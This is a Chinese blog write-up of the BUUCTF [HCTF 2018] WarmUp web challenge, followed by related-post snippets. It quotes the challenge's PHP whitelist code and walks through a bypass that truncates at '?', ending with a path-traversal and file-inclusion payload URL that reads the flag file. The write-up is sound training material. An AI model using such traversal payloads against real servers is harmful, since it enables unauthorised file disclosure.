buu[HCTF 2018]WarmUp 代码审计 php

已于 2024-03-18 21:07:51 修改
阅读量881 收藏 13
点赞数 12
文章标签: web安全
于 2024-02-05 20:44:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79359652/article/details/136047575
版权

首先,对index的认识:

1、网站默认页面,负责展示网站内容;

2、处理和执行传递给该页面的请求参数,并根据不同参数返回不同结果;

3、作为框架的入口,方便控制整个网站请求的管理;

4、作为API的入口,方便数据交互和处理。

后缀加/index.php可以直接进行访问,后再加一个“?”进行GET或POST传参

php相关函数

isset() 函数用于检测变量是否已设置并且非 NULL。

in_array() 函数搜索数组中是否存在指定的值。

mb_substr() 函数返回字符串的一部分,之前我们学过 substr() 函数,它只针对英文字符,如果要分割的中文文字则需要使用 mb_substr()。

mb_strpos — 查找字符串在另一个字符串中首次出现的位置

$_REQUEST 用于收集 HTML 表单提交的数据

empty() 函数用于检查一个变量是否为空。

文件所处位置:

"./":代表目前所在的目录。

" . ./"代表上一层目录。

"/":代表根目录。

buu[HCTF 2018]WarmUp 代码审计 php

第一步查看源码,找到提示,直接访问/source.php查看php

直接就是源码,接着进行审计

  <?php
     highlight_file(__FILE__);
     class emmm
     {
         public static function checkFile(&$page)//传入变量page
         {
             //定义白名单
             $whitelist ["source"=>"source.php","hint"=>"hint.php"];//传参试试看
             if (! isset($page) || !is_string($page)) {
                 //flies存在,且为字符串
                 echo "you can't see it";
                 return false;
             }
 ​
             if (in_array($page, $whitelist)) {
                 //白名单过滤
                 return true;
             }
 ​
             $_page = mb_substr(
                 $page,
                 0,
                 mb_strpos($page . '?', '?')
             );
             /*是个截断,获取两个“?”之间的字符串*/
             if (in_array($_page, $whitelist)) {
                 return true;
             }
 ​
             $_page = urldecode($page);//url编码
             $_page = mb_substr(
                 $_page,
                 0,
                 mb_strpos($_page . '?', '?')
             );//再次进行如上面的截断
             if (in_array($_page, $whitelist)) {
                 return true;
             }
             echo "you can't see it";
             return false;
         }
     }
 ​
     if (! empty($_REQUEST['file'])
         && is_string($_REQUEST['file'])
         && emmm::checkFile($_REQUEST['file'])
     ) {
         include $_REQUEST['file'];
         exit;
     } else {
         echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
     }  
 ?>

因为要满足四个if皆成立,所以从传入参数必须为白名单,两个参数皆传入尝试发现hint.php,得到flag所处位置在ffffllllaaaagggg

又发现需要在两个?之间且第三个if先进行url解码,直接进行url解码,发现?不受影响故而不对其做出更改。

猜测ffff重复了四次故在第四层目录,使用四层或五层../

http://efd74f9a-2e49-41bc-a554-9a5dfb02ecfa.node5.buuoj.cn:81/index.php?file=source.php?../../../../../ffffllllaaaagggg

(或者http://efd74f9a-2e49-41bc-a554-9a5dfb02ecfa.node5.buuoj.cn:81/index.php?file=hint.php?../../../../../ffffllllaaaagggg)

止kk
关注
  • 12
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
BUU刷题之代码审计
夜幕下的灯火阑珊的博客
05-06 625
[极客大挑战 2019]PHP 题目提示备份文件, 使用webscan工具扫描一下备份文件 py -2 main.py -u http://88bf6495-760a-4a63-aec1-7d1a3a9d9d0c.node3.buuoj.cn/ 扫描得到www.zip文件 解压得到index.php文件和class.php <?php include 'class.php'; ...
POSN:POSN-BUU的源代码
04-01
POSN(Positioning System)是一种用于...要深入理解POSN-BUU的具体实现,你需要阅读源代码、了解其设计思路和算法,并结合实际的硬件环境和数据输入进行分析。通过这种方式,你可以逐步掌握这个定位系统的运作机制。
【CTF练习】BUU CODE REVIEW 1(代码审计
m0_73866435的博客
01-31 1520
大致流程第一个if满足进入的条件为第二个if满足条件为。第三个if满足条件为。如果 1、2、3 条件都满足之后就会执行反序列化,通过POST 传参obj 执行,然后进入类函数类函数也有一个if满足条件为。但是correct 却是利用一个时间进行计算的值的base64 值。那么为什么执行反序列化就会自动进行类函数执行呢,我们来了解一下魔术方法。
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 645
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
BUUCTF WEB [极客大挑战 2019]Secret File1(抓包、代码审计、文件包含)
guishengyx的博客
10-18 1414
首先是一个黑色界面 看起来没什么可以点击的地方 其实有,瞎点还真找到了 大概在这里 不过也不用费力去找,直接看源码,发现链接 点击进入Archive_room.php 页面中间一个按钮,点击进入看看 盲猜一手他有问题,尝试抓包看看 重发得到一个被注释的php 访问 又是代码审计 strstr() — 查找字符串的首次出现 stristr() — strstr() 函数的忽略大小写版本 所以要构造一个没有../没有tp没有input没有data的payl...
Buuctf-warmup代码审计
qq_61968245的博客
12-15 1047
0x01 题目链接 https://buuoj.cn/challenges#[HCTF%202018]WarmUphttps://buuoj.cn/challenges#[HCTF%202018]WarmUp 0x02 知识点 isset($name):判断变量是否存在 is_string($name):判断变量是否为字符串 in_array($search,$array):判$search是否在$array数组里 mb_stro...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛_easywasm"中,参赛者可能需要利用这些技术来识别代码中的特定模式、异常行为或者隐藏的入口点,从而解决挑战。这可能涉及到破解密码、找到安全漏洞或者执行特定的计算任务。逆向分析...
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
代码审计和动态测试——BUUCTF - 高明的黑客
ancan8807的博客
09-07 433
根据题目提示,访问http://2ea746a2-0ecd-449b-896b-e0fb38956134.node1.buuoj.cn/www.tar.gz下载源码 解压之后发现有3002个php文件,而且大部分文件都是垃圾代码,解读不了。 观察之后发现存在_GET 和 _POST,于是通过脚本进行批量扫描,通过加入echo之类的代码,只要能运行就说明该文件可以用。 ...
代码审计buu_[极客大挑战 2019]RCE ME
serendipity1130的博客
10-11 680
1.代码审计发现需要传入code参数,并且需要绕过数字和字母过滤后的正则: 2.首先构造查看phpinfo中所禁用的函数: php -r "echo urlencode(~'phpinfo');" #%8F%97%8F%96%91%99%90 使用~取反后的url进行编码时会将其编码为无法识别的字符,再在code传参时再次取反就可以绕过无字母无数字的过滤。 http://c1e50a2c-9d42-44ec-8781-ae37a0aa5e7d.node4.buuoj.cn:81/?c
BUU [极客大挑战 2019]PHP(代码审计+序列化) write up
tothemoon的博客
03-30 605
提示有备份,菜鸡我第一时间想到的就是index.php.bak,但试过后明显没有这个文件,于是只有用dirsearch扫描以下目录了。 index.php里面包含了class.php include() //可运行包含文件里的代码 $_GET() //传参 unserialize() //反序列化 然后去看class.php,有一大堆函数,相当于给index.php加了一个Name...
BUU 302重定向、php代码审计、文件包含漏洞-[极客大挑战 2019]Secret File
Ivyyyyyy1的博客
10-17 3257
一、题目 碰到这种黑页面第一时间扒源代码 发现提示页面 ./Archive_room.php 点进去 果然还有一关,应该快了吧,点进SECRET 我 ********** 源代码里面啥都没了 二、解题 没事儿抓抓包,说不定有线索呢 这里我们用BP抓到了点击SECRET按钮时的包 可以看到这个包的Status是302,即它被重定向了 302重定向经常被用于做url劫持,黑帽seo技术中,而且百度在处理302重定向技术还不成熟,经常将它纳入到黑帽seo的范...
FairGuard游戏加固入选《嘶吼2024网络安全产业图谱》
FairGuard手游加固(企业官方博客)
07-19 159
FairGuard游戏加固作为游戏安全行业领先的第三方服务商,凭借技术创新、产品服务及市场反馈等多方面优异表现获得业界认可,实力入选移动应用安全细分领域。
用AI对抗AI:Fortinet解锁家电制造网络安全新密码
最新发布
Fortinet_CHINA的博客
07-19 649
Fortinet盛大启幕《构筑垂直行业 网络安全防线》系列研讨会。Fortinet中国南区资深安全顾问黄志攀深入洞察家电制造行业的网络安全挑战,全面解析了Fortinet如何通过全栈AI技术重塑OT安全解决方案,以应对复杂多变的威胁环境。家电制造行业网络安全深度分析家电制造产线的安全现状普遍令人担忧,主要体现在网络架构的两极分化、显著的安全与管理风险、安全区域划分的缺失,以及OT网络面临的直接威胁。
网络安全-网络安全及其防护措施12
LS_Ai的博客
07-19 411
软件定义网络(SDN)是一种网络架构,它通过将网络的控制平面(Control Plane)从数据转发平面(Data Plane)中分离出来,并集中在一个控制器中进行管理和配置。SDN通过集中化的控制和灵活的编程接口,提供对网络的动态管理和自动化能力。软件定义广域网(SD-WAN)是一种基于软件定义网络(SDN)技术的广域网解决方案,通过集中控制和智能路由功能,优化多地点分支机构之间的网络连接。SD-WAN通过虚拟化网络功能,简化了广域网的部署和管理,提高了网络性能和应用体验。
静态IP地址在网络安全中的角色解析与实测分析
2401_85937702的博客
07-19 641
在这个网络边界日益模糊的时代,每一次点击、每一次数据传输都有着安全问题。作为网络安全体系中的基石,静态IP地址的角色显得尤为重要而复杂。今天,我们的测评团队将带您深入剖析静态IP地址在网络安全中的多重角色,并通过两家代理服务商的实测分析,为您揭开其在实际应用中的神秘面纱。
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 507
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值